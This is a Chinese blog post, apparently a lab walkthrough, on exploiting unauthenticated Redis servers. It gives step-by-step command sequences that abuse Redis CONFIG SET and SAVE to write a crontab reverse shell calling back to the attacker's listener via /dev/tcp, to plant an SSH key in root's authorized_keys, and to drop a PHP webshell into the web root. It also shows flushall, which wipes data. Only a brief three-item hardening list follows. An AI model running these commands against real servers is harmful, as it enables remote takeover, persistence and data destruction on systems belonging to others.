Redis未授权访问漏洞利用总结

0x01 redis介绍

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。

Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。
攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。

如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

0x02 本地漏洞环境搭建

靶机:CentOS6.5

CentOS安装redis:
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
修改配置文件,使可以远程访问:
vim redis.conf

bind 127.0.0.1前面加上#号 protected-mode设为no
启动redis-server

./src/redis-server redis-conf

默认的配置是使用6379端口,没有密码。这时候会导致未授权访问然后使用redis权限写文件。

0x03 攻击测试

nmap扫描服务器开启端口


1.redis基本命令

连接redis:

redis-cli -h 192.168.63.130

查看redis版本信息、一些具体信息、服务器版本信息等等:

192.168.63.130:6379>info
将变量x的值设为test:
192.168.63.130:6379>set x "test"
是把整个redis数据库删除,一般情况下不要用!!!
192.168.63.130:6379>flushall
查看所有键:
192.168.63.130:6379>KEYS *

获取默认的redis目录、和rdb文件名:可以在修改前先获取,然后走的时候再恢复。

192.168.63.130:6379>CONFIG GET dir
192.168.63.130:6379>CONFIG GET dbfilename

2.攻击的几种方法

(1).利用计划任务执行命令反弹shell

在redis以root权限运行时可以写crontab来执行命令反弹shell

先在自己的服务器上监听一个端口

nc -lvnp 7999
然后执行命令:
root@kali:~# redis-cli -h 192.168.63.130
192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
OK
192.168.63.130:6379> config set dir /var/spool/cron/
OK
192.168.63.130:6379> config set dbfilename root
OK
192.168.63.130:6379> save
OK

nc监听端口已经反弹回来shell


ps:此处使用bash反弹shell,也可使用其他方法

(2).写ssh-keygen公钥然后使用私钥登陆

在以下条件下,可以利用此方法

  • Redis服务使用ROOT账号启动
  • 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。

首先在本地生成一对密钥:

root@kali:~/.ssh# ssh-keygen -t rsa

然后redis执行命令:

192.168.63.130:6379> config set dir /root/.ssh/
OK
192.168.63.130:6379> config set dbfilename authorized_keys
OK
192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
OK
192.168.63.130:6379> save
OK
save后可以直接利用公钥登录ssh


(3).往web物理路径写webshell

当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时,可以尝试往web路径写webshell

执行以下命令

192.168.63.130:6379> config set dir /var/www/html/
OK
192.168.63.130:6379> config set dbfilename shell.php
OK
192.168.63.130:6379> set x "<?php phpinfo();?>"
OK
192.168.63.130:6379> save
OK

即可将shell写入web目录(web目录根据实际情况)


0x04 安全配置

  • 限制登录ip
  • 添加密码
  • 修改默认端口
  • 13
    点赞
  • 64
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值